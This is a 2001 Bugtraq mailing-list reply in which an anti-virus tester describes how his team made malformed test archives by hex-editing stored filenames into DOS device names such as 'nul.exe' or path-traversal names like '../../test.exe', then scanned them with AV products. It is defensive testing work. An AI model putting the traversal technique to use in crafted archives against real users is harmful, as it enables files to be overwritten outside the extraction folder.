Bugtraq mailing list archives
Re: SECURITY.NNOV: special devices access in multiple archivers
From: Andreas Marx <amarx () gega-it de>
Date: Fri, 03 Aug 2001 13:43:06 +0200
Hi!
Its nice to hear that from U. I just want to know that what are the methods and tools used by ur team for the testing the Anti-Virus If u can send them to me, then i am very thankful to u
We, the Anti-Virus Test Team at the University of Magdeburg ( http://www.av-test.org ) did it the following way (I don't want to be too exact, because of the script kiddies, sorry):
First we've created normal archives using a standard archivers (and normal file names like "xul.exe"), but after the archive was created, we have edited the files internally using a hex editor (change "x" to "n" - but be careful, in ZIP files the fine name is included twice). You cannot add names like "nul.exe" to an archive, of course, but you can change the name inside of the archives easily, if the length of the name will still be the same. You can do this for both "nul.exe" or for additional "../"'s for paths like "../../test.exe". (Btw, we have used the Volkow Commander (DOS), not a "real" hex editor. :) )
Second step was to test the anti-virus and anti-trojan programs. This was relatively simple, because a few days ago we have just finished a bigger comparison test for trojaner-info.de, a big German security site ( http://www.trojaner-info.de/test_07_2001.shtml ) with a special focus on trojan horses, backdoors etc. Additional tests were done using a slightly older test set of a review we did for the German PC-WELT magazine ( http://www.pcwelt.de/ratgeber/anwendungen/viren-report/16583/3.html ). We can easily restore the original tested programs including updates, since we're using Ghost images for all types of tests. (This includes both the original test platforms, like "plain Win98", and a Ghost image where the av program was already installed.)
The main test was relatively simply - simple scan the archives (for each of the tests we created at least four test files) and look what will happen. ;-) After this, we have repeated the test to ensure that all results were correct.
I hope, this helps to understand the test procedures better. cheers, Andreas Marx NEW: Notes 4/5 + Exchange 5.5/2000 Test -> http://www.av-test.org -- Andreas Marx <amarx () gega-it de>, http://www.av-test.de GEGA IT-Solutions GbR, Klewitzstr. 7, 39112 Magdeburg, Germany Tel: 0391/6075466, Mobil: 0177/6133033, Fax: 0391/6075469
Current thread:
- Re: SECURITY.NNOV: special devices access in multiple archivers Andreas Marx (Aug 02)
- Message not available
- Re: SECURITY.NNOV: special devices access in multiple archivers Andreas Marx (Aug 03)
- Re: SECURITY.NNOV: special devices access in multiple archivers Juergen P. Meier (Aug 05)
- Re: SECURITY.NNOV: special devices access in multiple archivers Andreas Marx (Aug 10)
- Re: SECURITY.NNOV: special devices access in multiple archivers Andreas Marx (Aug 03)
- Message not available